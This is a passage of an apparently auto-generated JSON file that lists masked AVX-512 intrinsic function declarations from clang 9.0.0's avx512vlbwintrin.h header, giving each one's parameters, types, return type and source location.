}, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_adds_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:707:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_adds_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:715:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_adds_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:723:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_adds_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:731:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_adds_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:739:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_adds_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:747:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_adds_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:755:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_adds_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:763:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_adds_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:771:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_adds_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:779:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_adds_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:787:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_avg_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:795:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_avg_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:803:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_avg_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:811:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_avg_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:819:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_avg_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:827:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_avg_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:835:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_avg_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:843:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_avg_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:851:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_maskz_max_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:859:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_max_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:867:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_max_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:875:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_max_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:883:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_maskz_max_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:891:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_max_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:899:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_max_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:907:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_max_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:915:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_maskz_max_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:923:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_max_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:931:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_max_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:939:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_max_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:947:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_maskz_max_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:955:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_max_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:963:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_max_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:971:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_max_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:979:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_maskz_min_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:987:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_min_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:995:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_min_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1003:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_min_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1011:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_maskz_min_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1019:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_min_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1027:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_min_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1035:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_min_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1043:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_maskz_min_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1051:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_min_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1059:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_min_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1067:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_min_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1075:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_maskz_min_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1083:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_min_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1091:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_min_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1099:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_min_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1107:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_shuffle_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1115:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_shuffle_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1123:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_shuffle_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1131:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_shuffle_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1139:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_subs_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1147:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_subs_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1155:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_subs_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1163:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_subs_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1171:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_subs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1179:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_subs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1187:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_subs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1195:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { 